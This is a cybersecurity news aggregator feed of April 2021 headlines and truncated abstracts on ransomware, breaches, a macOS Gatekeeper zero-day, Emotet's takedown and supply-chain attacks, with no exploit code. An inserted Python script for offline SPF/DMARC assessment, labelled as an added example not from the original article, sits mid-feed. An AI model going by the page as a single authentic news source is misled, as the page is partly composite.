Security is only as strong as the weakest link. As further proof of this, Apple released an update to macOS operating systems to address an actively exploited zero-day vulnerability that could circumvent all security protections, thus permitting unapproved software to run on Macs. The macOS flaw, identified as CVE-2021-30657 , was discovered and reported to Apple by security engineer Cedric Owens on March 25, 2021. "An unsigned, unnotarized, script-based proof of concept application [...] could trivially and reliably sidestep all of macOS's relevant security mechanisms (File Quarantine, Gatekeeper, and Notarization Requirements), even on a fully patched M1 macOS system," security researcher Patrick Wardle explained in a write-up. "Armed with such a capability macOS malware authors could (and are) returning to their proven methods of targeting and infecting macOS users." Apple's macOS comes with a feature called Gatekeeper , which allows only trusteThe Hacker News
April 27, 2021 – Breach
Online Music Marketplace Suffers Data Breach Full Text
Abstract
Cybersecurity researcher finds millions of Reverb.com records on unprotected serverInfosecurity Magazine
April 27, 2021 – Ransomware
Ransomware hit Guilderland Central School District near Albany Full Text
Abstract
Officials revealed that the school district near Albany was hit by a ransomware attack that forced students in grades 7 through 12 into all-remote learning on Monday. The Guilderland Central School District near Albany was hit by a ransomware attack...Security Affairs
April 27, 2021 – Business
Cigent gets $7.6 million to reimagine data protection at the file level Full Text
Abstract
The cybersecurity startup is being backed by In-Q-Tel and other investors to bring their data defense technologies to the commercial market.SCMagazine
April 27, 2021 – Phishing
Phishing attacks target Chase Bank customers Full Text
Abstract
In a new report released Tuesday, security firm Armorblox revealed two recent phishing campaigns aimed at Chase Bank customers with an objective to steal their account credentials.Tech Republic
April 27, 2021 – General
Parents Should Take Action to Protect Children from Cyber-Risks Full Text
Abstract
What are the cyber-risks facing children, and how can these be tackled by parents?Infosecurity Magazine
April 27, 2021 – Malware
WhatsApp Pink Malware Can Auto-Reply to Multiple Messaging Apps Full Text
Abstract
A new version of WhatsApp is making rounds. It claims to give you an enhanced version of WhatsApp with additional features but the truth is that this WhatsApp clone app is malicious.Cyware Alerts - Hacker News
April 27, 2021 – Hacker
REvil Removes Apple Extortion Attempt from Site: Report Full Text
Abstract
Mystery as ransomware group deletes all mention of schemeInfosecurity Magazine
April 27, 2021 – Vulnerabilities
Apple iOS 14.5 Patches 50 Security Vulnerabilities Full Text
Abstract
Apple on Monday shipped the long-awaited iOS and iPadOS 14.5 update with patches for at least 50 documented security vulnerabilities including a WebKit flaw exploited in the wild.Security Week
April 27, 2021 – Business
Private Equity Giant Snaps Up Proofpoint for $12.3 billion Full Text
Abstract
Thoma Bravo will add the SaaS player to its large security portfolioInfosecurity Magazine
April 27, 2021 – Government
FBI Shares Email Addresses to Speed Emotet Cleanup Full Text
Abstract
The FBI has shared 4.3 million email addresses stolen by the Emotet malware with the Have I Been Pwned breach notification site in another effort to remediate the effects of the devastating botnet.Info Risk Today
April 27, 2021 – Hacker
Ransomware Group Threatens DC Cops with Informant Data Leak Full Text
Abstract
Babuk is reportedly ready to share info with local gangsInfosecurity Magazine
April 27, 2021 – Attack
Ransomware Attack Forces Students Into Remote Learning at Guilderland Central School District Full Text
Abstract
The Guilderland Central School District near Albany was hit by a ransomware attack that forced students in grades 7 through 12 into all-remote learning on Monday, as confirmed by district officials.Security Affairs
April 27, 2021 – Business
Endpoint Management Firm Automox Raises $110 Million Full Text
Abstract
Cyber hygiene and patch management company Automox on Tuesday announced raising $110 million in a Series C funding round that brings the total raised by the firm to more than $152 million.Security Week
April 27, 2021 – Malware
New ICS Threat Activity Group: TALONITE Full Text
Abstract
TALONITE gains initial network access via spearphishing that leverages malicious documents and executables focused on engineering-specific themes and concepts to distribute FlowCloud and LookBack.Dragos
April 27, 2021 – Malware
Dridex Malware Returns In a New Global QuickBooks Malspam Campaign Full Text
Abstract
Phishing attacks masquerading as QuickBooks invoices are targeting users of the popular accounting software in an attempt to infect victims' devices with the infamous Dridex banking Trojan.Bitdefender
April 27, 2021 – Government
FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities. By employing "stealthy intrusion tradecraft within compromised networks," the intelligence agencies said , "the SVR activity—which includes the recent SolarWinds Orion supply chain compromise —primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information." The cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and formally pinnThe Hacker News
April 27, 2021 – Policy and Law
Australian man sentenced for running stolen subscription credential service Full Text
Abstract
An investigation into stolen subscription service credentials by the Australian Federal Police (AFP) has resulted in a sentence of two years and two months for a man from Sydney.ZDNet
April 27, 2021 – Malware
Microsoft Defender uses Intel TDT technology against crypto-mining malware Full Text
Abstract
Microsoft announced an improvement of its Defender antivirus that will leverage Intel's Threat Detection Technology (TDT) to detect processes associated with crypto-miners. Microsoft announced that Microsoft Defender for Endpoint, its commercial version...Security Affairs
April 27, 2021 – Business
Network security company Proofpoint goes private in $12.3B deal Full Text
Abstract
Private equity firm Thoma Bravo has announced plans to acquire cybersecurity company Proofpoint, which was founded in 2002 and went public in 2012, in a deal worth $12.3 billion.Venture Beat
April 27, 2021 – Malware
Shlayer macOS malware abuses zero-day to bypass Gatekeeper feature Full Text
Abstract
Apple addresses a zero-day in macOS exploited by Shlayer malware to bypass Apple's security features and deliver second-stage malicious payloads. Apple has addressed a zero-day flaw in macOS that was exploited by Shlayer malware to bypass Apple's...Security Affairs
April 26, 2021 – General
Water utility CISO offers tips to stay secure as IT and OT converge Full Text
Abstract
Kristin Sanders, chief information security officer for the Albuquerque Bernalillo County Water Utility Authority, revealed how New Mexico’s largest water and wastewater utility has been addressing the security challenge by leveraging a series of software solutions, sensors and internet-of-things technology.SCMagazine
April 26, 2021 – Ransomware
DC Police confirms cyberattack after ransomware gang leaks data Full Text
Abstract
The Metropolitan Police Department has confirmed that they suffered a cyberattack after the Babuk ransomware gang leaked screenshots of stolen data.BleepingComputer
April 26, 2021 – General
Hillicon Valley: New cyber budget request | Apple rolls out anticipated privacy update | And gets a new antitrust challenge Full Text
Abstract
Happy Monday! A bipartisan group of representatives think a key cybersecurity agency is in need of more funding after responses to SolarWinds and new Microsoft vulnerabilities. Also, Apple rolled out its long awaited privacy feature, which has already received significant criticism from Facebook.The Hill
April 26, 2021 – Breach
Reverb discloses data breach exposing musicians’ personal info Full Text
Abstract
Popular musical instrument marketplace Reverb has suffered a data breach after an unsecured database containing customer information was exposed online.BleepingComputer
April 26, 2021 – Vulnerabilities
Boffins found a bug in Apple AirDrop that could leak users’ personal info Full Text
Abstract
Experts found a bug in Apple's wireless file-sharing protocol AirDrop that could expose users' contact information. Boffins from the Technical University of Darmstadt, Germany, have discovered a privacy issue in Apple's wireless file-sharing...Security Affairs
April 26, 2021 – Privacy
Flubot Spyware Spreading Through Android Devices Full Text
Abstract
The malware is spreading rapidly through ‘missed package delivery’ SMS texts, prompting urgent scam warnings from mobile carriers.Threatpost
April 26, 2021 – Government
Lawmakers call for increasing the budget of key federal cybersecurity agency Full Text
Abstract
A pair of House lawmakers are urging legislators to appropriate more funding for a key federal cybersecurity agency after a year in which cyber threats skyrocketed.The Hill
April 26, 2021 – General
22% of all users still run Microsoft end-of-life Windows 7 Full Text
Abstract
Microsoft stopped supporting Windows 7 in January 2020, meaning users don’t get software updates and are more susceptible to attacks.SCMagazine
April 26, 2021 – Ransomware
Ransomware gang now warns they will leak new Apple logos, iPad plans Full Text
Abstract
The REvil ransomware gang has mysteriously removed Apple's schematics from their data leak site after privately warning Quanta that they would leak drawings for the new iPad and new Apple logos.BleepingComputer
April 26, 2021 – Breach
Accellion data breaches drive up average ransom price Full Text
Abstract
The data breaches caused by the Clop ransomware gang exploiting a zero-day vulnerability have led to a sharp increase in the average ransom payment calculated for the first three months of the year.BleepingComputer
April 26, 2021 – Vulnerabilities
Apple fixes macOS zero-day bug exploited by Shlayer malware Full Text
Abstract
Apple has fixed a zero-day vulnerability in macOS exploited in the wild by Shlayer malware to bypass Apple's File Quarantine, Gatekeeper, and Notarization security checks and download second-stage malicious payloads.BleepingComputer
April 26, 2021 – Botnet
When Should U.S. Cyber Command Take Down Criminal Botnets? Full Text
Abstract
The Trickbot takedown and such military operations are a good idea only in cases that meet a five-part test of imminence, severity, overseas focus, nation-state adversary, and military as a last-ish resort.Lawfare
April 26, 2021 – Business
With $30M extension, BigID boosts Series D to $100M at $1.25B valuation Full Text
Abstract
After announcing a $70 million Series D at a $1 billion valuation at the end of 2020, now BigID announced a $30 million extension from Advent International valuing the company at $1.25 billion.TechCrunch
April 26, 2021 – Vulnerabilities
Nvidia Warns: Severe Security Bugs in GPU Driver, vGPU Software Full Text
Abstract
The gaming- and AI-friendly graphics accelerators can open the door to a range of cyberattacks.Threatpost
April 26, 2021 – Government
State-Sponsored Adversaries Increasingly Targeting the U.S. Full Text
Abstract
The intelligence community is warning about the rise in U.S. adversaries that are using cyberspace to attack the country. It named China, Iran, North Korea among the top threats.Cyware Alerts - Hacker News
April 26, 2021 – IOT
IoT Devices Under Constant Cyber Threat Full Text
Abstract
A series of recent attacks on IoT devices points to the larger security risks these devices carry. The situation is more concerning for consumers, who are generally unaware of the threats and lack the resources to mitigate them.Cyware Alerts - Hacker News
April 26, 2021 – Business
AirEye Raises $8M Series A to Extend Network Security into the Unprotected Digital Airspace Full Text
Abstract
AirEye, a Network Airspace Protection (NAP) provider, announced raising $8 million in its Series A funding round led by U.S. Venture Partners (USVP), with Canaan Partners also taking part.Yahoo! Finance
April 26, 2021 – Policy and Law
Nintendo Sues Bowser Full Text
Abstract
Gaming giant files lawsuit against alleged leader of video game piracy groupInfosecurity Magazine
April 26, 2021 – Vulnerabilities
Apple patches ‘worst macOS bug in recent memory’ after it was used in the wild Full Text
Abstract
The bug, patched in macOS 11.3, allowed hackers to circumvent much of Apple’s built-in malware detection for programs downloaded from the internet.SCMagazine
April 26, 2021 – Malware
Microsoft Defender now blocks cryptojacking malware using Intel TDT Full Text
Abstract
Microsoft today announced that Microsoft Defender for Endpoint, the enterprise version of its Windows 10 Defender antivirus, now comes with support for blocking cryptojacking malware using Intel's silicon-based Threat Detection Technology (TDT).BleepingComputer
April 26, 2021 – Ransomware
The Mysterious Tale of a Ransomware Cartel Full Text
Abstract
Analysis suggests that four different ransomware groups formed a cartel to leak stolen data via their partners. What surprised the researchers most is the missing element of profit-sharing.Cyware Alerts - Hacker News
April 26, 2021 – Attack
Cyber-attack on NBA Team Full Text
Abstract
Investigation launched into cyber-attack on Houston RocketsInfosecurity Magazine
April 26, 2021 – Breach
Threat Actor Leaks 263GB Data Containing Sensitive Household Records of 250 Million Americans on Hacker Forum Full Text
Abstract
As seen by Hackread.com, the database was leaked on a prominent hacker forum and comprises 263 GB worth of records including 1,255 CSV subfiles each with 200,000 listings.Hackread
April 26, 2021 – Government
Space Command to Launch Dedicated Cyber Center Full Text
Abstract
Joint cyber center planned to help Cyber Command and Space Command integrateInfosecurity Magazine
April 26, 2021 – General
In the Wake of SolarWinds, the U.S. Must Grapple With the Future and Not Just the Past Full Text
Abstract
Given the wide range of strategic and tactical benefits for Russia, a cyber operation with SolarWinds’ scale and sophistication should never be understood as “just espionage.”Lawfare
April 26, 2021 – Government
US warns of Russian state hackers still targeting US, foreign orgs Full Text
Abstract
The FBI, the US Department of Homeland Security (DHS), and the Cybersecurity and Infrastructure Security Agency (CISA) warned today of continued attacks coordinated by the Russian-backed APT 29 hacking group against US and foreign organizations.BleepingComputer
April 26, 2021 – Ransomware
61% of organizations impacted by ransomware in 2020 Full Text
Abstract
In a Mimecast survey, a full 79% of respondents indicated their companies had experienced a business disruption, financial loss, or other setbacks in 2020 due to a lack of cyber preparedness.Help Net Security
April 26, 2021 – Botnet
Bye Bye Emotet, law enforcement pushed the uninstall code via the botnet Full Text
Abstract
European law enforcement has conducted an operation aimed at performing a mass-sanitization of computers infected with the infamous Emotet Windows malware. European law enforcement agencies automatically wiped the infamous Emotet malware from infected...Security Affairs
April 26, 2021 – Criminals
Cybercriminals evolving their tactics to exploit collective human interest Full Text
Abstract
Phishing activity increased significantly in the first few months of 2020, taking advantage of pandemic-induced product shortages and increased usage of streaming services, OpenText reveals.Help Net Security
April 26, 2021 – Solution
NFC Forum specifications offer cryptographic security for NFC application development Full Text
Abstract
The NFC Authentication Protocol 1.0 Specification (NAP 1.0) provides a framework for using cryptography to establish a secure channel and authentication as well as the bonding between two devices.Help Net Security
April 26, 2021 – Malware
European Law Enforcement Uses Customized DLL to Wipe Emotet Malware from Infected Windows PCs Full Text
Abstract
The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in a multinational police operation.The Register
April 26, 2021 – Malware
Minnesota University Apologizes for Contributing Malicious Code to the Linux Project Full Text
Abstract
Researchers from the University of Minnesota apologized to the maintainers of Linux Kernel Project on Saturday for intentionally including vulnerabilities in the project's code, which led to the school being banned from contributing to the open-source project in the future. "While our goal was to improve the security of Linux, we now understand that it was hurtful to the community to make it a subject of our research, and to waste its effort reviewing these patches without its knowledge or permission," assistant professor Kangjie Lu, along with graduate students Qiushi Wu and Aditya Pakki, said in an email. "We did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches," they added. The apology comes over a study into what's called "hypocrite commits," which was published earlier this February. The project aimed to deliberately add use-after-free vulnerabilThe Hacker News
April 26, 2021 – General
E-commerce Fraud to Exceed $20 Billion in 2021 Full Text
Abstract
Juniper Research backs AI-powered behavioral biometricsInfosecurity Magazine
April 26, 2021 – Botnet
Prometei botnet is targeting ProxyLogon Microsoft Exchange flaws Full Text
Abstract
Attackers are exploiting the ProxyLogon flaws in Microsoft Exchange to recruit machines in a cryptocurrency botnet tracked as Prometei. Experts from the Cybereason Nocturnus Team have investigated multiple incidents involving the Prometei Botnet....Security Affairs
April 26, 2021 – Ransomware
Targeted ransomware attacks grow 767%, India among top targets Full Text
Abstract
The ransomware attacks on high-profile targets such as corporations and government agencies globally increased by a whopping 767% in one year from 2019 to 2020, according to a new report.The Times Of India
April 26, 2021 – Vulnerabilities
Apple AirDrop Bug Could Leak Your Personal Info to Anyone Nearby Full Text
Abstract
New research has uncovered privacy weaknesses in Apple's wireless file-sharing protocol that could result in the exposure of a user's contact information such as email addresses and phone numbers. "As an attacker, it is possible to learn the phone numbers and email addresses of AirDrop users – even as a complete stranger," said a team of academics from the Technical University of Darmstadt, Germany. "All they require is a Wi-Fi-capable device and physical proximity to a target that initiates the discovery process by opening the sharing pane on an iOS or macOS device." AirDrop is a proprietary ad hoc service present in Apple's iOS and macOS operating systems, allowing users to transfer files between devices by making use of close-range wireless communication. While this feature shows only receiver devices that are in users' contact lists by an authentication mechanism that compares an individual's phone number and email address with entrieThe Hacker News
April 26, 2021 – Government
Cyber Ninjas Forges on With Controversial Arizona Election Recount Full Text
Abstract
State senate hires inexperienced consultancy for recountInfosecurity Magazine
April 26, 2021 – Malware
Malware Attack at Technology Provider Radixx Causes Outages in Airline Reservation Systems Full Text
Abstract
Radixx, a technology provider, says a malware attack triggered a dayslong outage that has caused reservations systems to crash at about 20 low-cost airlines around the world.Washington Post
April 26, 2021 – Government
How to Test and Improve Your Domain’s Email Security? Full Text
Abstract
No matter which type of business you are in, whether small, medium, or large, email has become an irrefutable tool for communicating with your employees, partners, and customers. Emails are sent and received each day in bulk by companies from various sources. In addition, organizations may also employ third-party vendors who may be authorized to send emails on behalf of the company. As a result, it becomes increasingly difficult to distinguish between sources that are legitimate and malicious. Here's a solution – PowerDMARC. This SaaS platform helps you assess your email authentication protocols from time to time and see if your domain is secure against spoofing with a DMARC record checker, so you can make changes if necessary. Check Your Domain Today! Use our free tool to examine your domain's DMARC, SPF, DKIM, BIMI, and MTA-STS records instantly to ensure your domain is protected from impersonation and email fraud! Importance of Having Robust Email Security in 2021 SThe Hacker News
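The record checks the PowerDMARC pitch above refers to can be reproduced offline. The following Python is an added example, not PowerDMARC's code and not from the original article: it parses SPF and DMARC TXT records from an in-memory table of constructed records and flags the weak settings a practitioner looks for (p=none, missing rua=, pct below 100, sp=none, ~all/+all/?all, and more than ten DNS-lookup mechanisms, which RFC 7208 turns into a permerror). The domain names and records are constructed; swap the table for real `dig TXT` output to run it against your own domain.

```python
"""Offline SPF/DMARC record assessment (added example; records are constructed)."""


# Constructed sample records: what a TXT lookup of each name is assumed to return.
SAMPLE_RECORDS = {
    "example.test": ["v=spf1 include:_spf.mailprovider.test include:thirdparty.test ~all"],
    "_dmarc.example.test": ["v=DMARC1; p=none; rua=mailto:dmarc@example.test"],
    "strict.test": ["v=spf1 ip4:192.0.2.0/24 -all"],
    "_dmarc.strict.test": [
        "v=DMARC1; p=reject; sp=reject; pct=100; adkim=s; aspf=s; "
        "rua=mailto:agg@strict.test; ruf=mailto:fail@strict.test"
    ],
}


def parse_dmarc(txt):
    """Split a DMARC record into tag -> value; None if it is not a DMARC record."""
    if not txt.strip().lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(txt):
    """Return findings for a DMARC record; an empty list means enforcing with reporting."""
    tags = parse_dmarc(txt)
    if tags is None:
        return ["no DMARC record (v=DMARC1 missing)"]
    findings = []
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none: monitor-only, spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"invalid or missing policy p={policy!r}")
    if "rua" not in tags:
        findings.append("no rua= aggregate reporting address")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        findings.append(f"pct={pct}: policy applied to only part of the mail stream")
    # sp= defaults to p= when absent; a weaker sp= leaves subdomains open to spoofing.
    if tags.get("sp", policy).lower() == "none" and policy != "none":
        findings.append("sp=none: subdomains unprotected")
    return findings


def assess_spf(txt):
    """Return findings for an SPF record: weak 'all' qualifier and DNS-lookup budget."""
    if not txt.lower().startswith("v=spf1"):
        return ["no SPF record (v=spf1 missing)"]
    findings = []
    lookups = 0
    all_qualifier = None
    for term in txt.split()[1:]:
        bare = term.lstrip("+-~?")
        if bare == "all":
            all_qualifier = term[0] if term[0] in "+-~?" else "+"
        elif bare.startswith(("include:", "exists:", "redirect=")) or \
                bare.split(":")[0].split("/")[0] in ("a", "mx", "ptr"):
            lookups += 1  # mechanisms that cost a DNS query (RFC 7208 section 4.6.4)
    if all_qualifier is None:
        findings.append("no 'all' mechanism: unlisted senders are permitted")
    elif all_qualifier in ("+", "?"):
        findings.append(f"'{all_qualifier}all' effectively permits any sender")
    elif all_qualifier == "~":
        findings.append("~all is softfail only; combine with DMARC p=reject or use -all")
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup mechanisms exceed the RFC 7208 limit of 10 (permerror)")
    return findings


def assess_domain(domain, records=SAMPLE_RECORDS):
    """Assess SPF and DMARC for a domain using the in-memory record table."""
    spf = [r for r in records.get(domain, []) if r.lower().startswith("v=spf1")]
    dmarc = records.get("_dmarc." + domain, [])
    return {
        "spf": assess_spf(spf[0]) if len(spf) == 1
               else [f"expected exactly one SPF record, found {len(spf)}"],
        "dmarc": assess_dmarc(dmarc[0]) if dmarc
                 else ["no DMARC record (v=DMARC1 missing)"],
    }


if __name__ == "__main__":
    for name in ("example.test", "strict.test"):
        print(name, assess_domain(name))
```

The lookup counter deliberately treats `redirect=` like `include:`: both spend one of the ten permitted queries, and exceeding the budget makes receivers return permerror, which is a common cause of "we have SPF but it does nothing" findings once several third-party senders have been added.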
April 26, 2021 – Ransomware
Mining technology company Gyrodata hit by ransomware attack – employee data leaked Full Text
Abstract
The data potentially leaked includes names, addresses, birthdates, drivers’ license numbers, social security numbers, passport numbers, W-2 tax forms, and information related to health plan enrolment.The Daily Swig
April 26, 2021 – Vulnerabilities
Bugs Allowed Hackers to Dox John Deere Tractor Owners Full Text
Abstract
A pair of bugs in John Deere's apps and website could have allowed hackers to find and download the personal data of all owners of the company's farming vehicles and equipment, as per a researcher.Vice
April 26, 2021 – Hacker
Hackers are targeting Soliton FileZen file-sharing servers Full Text
Abstract
Experts pointed out that the attacks began before the vendor had fixed the issues, meaning that we cannot exclude the possibility that threat actors have compromised organizations using FileZen.Security Affairs
April 26, 2021 – Malware
Emotet Malware Destroys Itself Today From All Infected Computers Full Text
Abstract
Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation. The development comes three months after a coordinated disruption of Emotet as part of " Operation Ladybird " to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation. Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action. Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. "All infected computer systems will automatically retrieve the update there, aThe Hacker News
April 26, 2021 – Breach
US Drilling Giant Gyrodata Reveals Employee Data Breach Full Text
Abstract
Ransomware attack earlier this year to blameInfosecurity Magazine
April 26, 2021 – Attack
A supply chain attack compromised the update mechanism of Passwordstate Password Manager Full Text
Abstract
The software company Click Studios was the victim of a supply chain attack, hackers compromised its Passwordstate password management application. Another supply chain attack made the headlines, the Australian software company Click Studios informed...Security Affairs
April 26, 2021 – Breach
Volunteer-run pirate Manga website attacked, loses hashed passwords, has ‘nobody’ to fix the mess Full Text
Abstract
An email to members seen by The Register says that as of April 22, MangaDex operators “have identified that a partial database leak” of members' information has been detected.The Register
April 26, 2021 – Breach
3.2 Billion Leaked Passwords Contain 1.5 Million Records with Government Emails Full Text
Abstract
A staggering 3.28 billion passwords linked to 2.18 billion unique email addresses were exposed in what's one of the largest data dumps of breached usernames and passwords. In addition, the leak includes 1,502,909 passwords associated with email addresses from government domains across the world, with the U.S. government alone taking up 625,505 of the exposed passwords, followed by the U.K (205,099), Australia (136,025), Brazil (68,535), and Canada (50,726). The findings come from an analysis of a massive 100GB data set called "COMB21" — aka Compilation of Many Breaches — that was published for free in an online cybercrime forum earlier this February by putting together data from multiple leaks in different companies and organizations that occurred over the years. It's worth noting that a leak doesn't imply a breach of public administration systems. The passwords are said to have been obtained via techniques such as password hash cracking after beingThe Hacker News
April 26, 2021 – Government
Minutes before Trump left office, millions of the Pentagon’s dormant IP addresses sprang to life Full Text
Abstract
After decades of not using a huge chunk of the Internet, the Pentagon has given control of millions of IP addresses to a previously unknown company called Global Resource Systems LLC.Washington Post
April 25, 2021 – Breach
Hacker leaks 20 million alleged BigBasket user records for free Full Text
Abstract
A threat actor has leaked approximately 20 million BigBasket user records containing personal information and hashed passwords on a popular hacking forum.BleepingComputer
April 25, 2021 – Government
Threat Campaign Against Researchers Ongoing, CISA Warns Full Text
Abstract
The CISA notification urges researchers to use sandbox systems isolated from trusted networks when analyzing untrusted websites or codes.Cyware Alerts - Hacker News
April 25, 2021 – Hacker
Hackers are targeting Soliton FileZen file-sharing servers Full Text
Abstract
Threat actors are exploiting two flaws in the popular file-sharing server FileZen to steal sensitive data from businesses and government organizations. Threat actors are exploiting two vulnerabilities in the popular file-sharing server FileZen, tracked...Security Affairs
April 25, 2021 – Malware
Emotet malware nukes itself today from all infected computers worldwide Full Text
Abstract
Emotet, one of the most dangerous email spam botnets in recent history, is being uninstalled today from all infected devices with the help of a malware module delivered in January by law enforcement.BleepingComputer
April 25, 2021 – General
Security Affairs newsletter Round 311 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. A member of the FIN7 group was sentenced to 10 years in prisonIs BazarLoader malware linked to Trickbot...Security Affairs
April 25, 2021 – Vulnerabilities
10,000+ unpatched ABUS Secvest home alarms can be deactivated remotely Full Text
Abstract
10,000+ unpatched ABUS Secvest home alarm systems could be remotely disabled exposing customers to intrusions and thefts. Researchers from Eye Security have found thousands of unpatched ABUS Secvest home alarm systems exposed online despite the vendor...Security Affairs
April 24, 2021 – Vulnerabilities
Critical RCE Bug Found in Homebrew Package Manager for macOS and Linux Full Text
Abstract
A recently identified security vulnerability in the official Homebrew Cask repository could have been exploited by an attacker to execute arbitrary code on users' machines that have Homebrew installed. The issue, which was reported to the maintainers on April 18 by a Japanese security researcher named RyotaK, stemmed from the way code changes in its GitHub repository were handled, resulting in a scenario where a malicious pull request — i.e., the proposed changes — could be automatically reviewed and approved. The flaw was fixed on April 19. Homebrew is a free and open-source software package manager solution that allows the installation of software on Apple's macOS operating system as well as Linux. Homebrew Cask extends the functionality to include command-line workflows for GUI-based macOS applications, fonts, plugins, and other non-open source software. "The discovered vulnerability would allow an attacker to inject arbitrary code into a cask and have it beThe Hacker News
April 24, 2021 – Malware
Prometei: Yet Another Malware Weaponizing Proxylogon Vulnerabilities
Abstract
The Prometei variant used in the recent attack was found to provide the attackers with a stealthy and sophisticated backdoor that supported a wide range of tasks, along with harvesting credentials. (Cyware Alerts - Hacker News)
April 24, 2021 – Breach
Passwordstate Password Manager Update Hijacked to Install Backdoor on Thousands of PCs
Abstract
Click Studios, the Australian software company behind the Passwordstate password management application, has notified customers to reset their passwords following a supply chain attack. The Adelaide-based firm said a bad actor used sophisticated techniques to compromise the software's update mechanism and used it to drop malware on user computers. The breach is said to have occurred between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC, for a total period of about 28 hours. "Only customers that performed In-Place Upgrades between the times stated above are believed to be affected," the company said in an advisory. "Manual Upgrades of Passwordstate are not compromised. Affected customers' password records may have been harvested." The development was first reported by the Polish tech news site Niebezpiecznik. It's not immediately clear who the attackers are or how they compromised the password manager's update feature. Click Studios said an... (The Hacker News)
April 24, 2021 – Ransomware
A ransomware gang made $260,000 in 5 days using the 7zip utility
Abstract
A ransomware gang has made $260,000 in just five days simply by remotely encrypting files on QNAP devices using the 7zip archive program. (BleepingComputer)
April 24, 2021 – Ransomware
NitroRansomware Demands Discord Gift Codes
Abstract
A new ransomware strain dubbed NitroRansomware is encrypting victims' files and then asking for a $9.99 Discord Nitro gift code to decrypt them. It gives a .givemenitro extension to encrypted files. (Cyware Alerts - Hacker News)
April 24, 2021 – Malware
New cryptomining malware builds an army of Windows, Linux bots
Abstract
A recently discovered cryptomining botnet is actively scanning for vulnerable Windows and Linux enterprise servers and infecting them with Monero (XMRig) miner and self-spreader malware payloads. (BleepingComputer)
April 24, 2021 – Malware
XCSSET Malware is Now Targeting Apple’s M1 Chip
Abstract
A Mac malware has been re-engineered and is being used in a campaign aimed at Apple’s new M1 chips to eventually steal data associated with popular applications including Evernote, WeChat, and more. (Cyware Alerts - Hacker News)
April 24, 2021 – General
The cybersecurity researcher Dan Kaminsky has died
Abstract
The cybersecurity community has lost its star: the popular hacker Dan Kaminsky has passed away. The popular cyber security researcher Dan Kaminsky (42) has passed away. Dan is a star, a myth, and a beacon for us. At the moment the causes of death... (Security Affairs)
April 24, 2021 – Malware
Fake Microsoft DirectX 12 site pushes crypto-stealing malware
Abstract
Cybercriminals have created a fake Microsoft DirectX 12 download page to distribute malware that steals your cryptocurrency wallets and passwords. (BleepingComputer)
April 24, 2021 – Government
Biden administration unveils plan to defend electric sector from cyberattacks
Abstract
The Biden administration is buckling down on cyber threats to U.S. power infrastructure. The Department of Energy (DOE) announced a 100-day plan to help shore up the U.S. electric power system against cyber threats. (Cyberscoop)
April 24, 2021 – Malware
ToxicEye RAT exploits Telegram communications to steal data from victims
Abstract
ToxicEye is a new Remote Access Trojan (RAT) that exploits the Telegram service as part of its command and control infrastructure. ToxicEye RAT is a new malware that leverages the Telegram services for command & control, experts from Check Point... (Security Affairs)
April 24, 2021 – Breach
HashiCorp is the latest victim of Codecov supply-chain attack
Abstract
Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key. (BleepingComputer)
April 24, 2021 – Business
KnowBe4 Issues IPO to Drive Global Expansion, New Automation Features
Abstract
Security awareness company KnowBe4 successfully debuted on the NASDAQ, with its initial public offering bringing in more than $150 million to fund the company's international expansion and a focus on new automation and machine learning features. (Dark Reading)
April 24, 2021 – Botnet
A new Linux Botnet abuses IaC Tools to spread and other emerging techniques
Abstract
A new Linux botnet uses Tor through a network of proxies using the Socks5 protocol, abuses legitimate DevOps tools, and employs other emerging techniques. Researchers from Trend Micro have spotted a new Linux botnet employing multiple emerging techniques... (Security Affairs)
April 24, 2021 – Phishing
Twitter alarms users with messages that resembled phishing emails
Abstract
Twitter sparked panic among users that they were the subjects of a phishing attack in what was instead an accidental mass email. The message sent to some Twitter users went out asking them to confirm their email addresses by clicking on a button. (Cyberscoop)
April 24, 2021 – Vulnerabilities
Unsecured Kubernetes Instances Could Be Vulnerable to Exploitation
Abstract
Kubernetes clusters can and should be configured for greater security, but when left unsecured, these clusters can be accessed anonymously by anyone who knows their IPs, ports, and APIs. (Palo Alto Networks)
April 23, 2021 – Ransomware
The Week in Ransomware - April 23rd 2021 - A brutal week
Abstract
This week has been brutal, not because of many ransomware variants released but due to a single ransomware campaign that affected thousands of people. (BleepingComputer)
April 23, 2021 – Business
Fraud prevention platform Sift raises $50M at over $1B valuation, eyes acquisitions
Abstract
Sift has raised $50 million in a funding round that values the company at over $1 billion. Insight Partners led the financing, which included participation from Union Square Ventures and Stripes. (TechCrunch)
April 23, 2021 – General
Hillicon Valley: Facebook, Twitter, YouTube execs to testify at Senate hearing on algorithms | Five big players to watch in Big Tech’s antitrust fight
Abstract
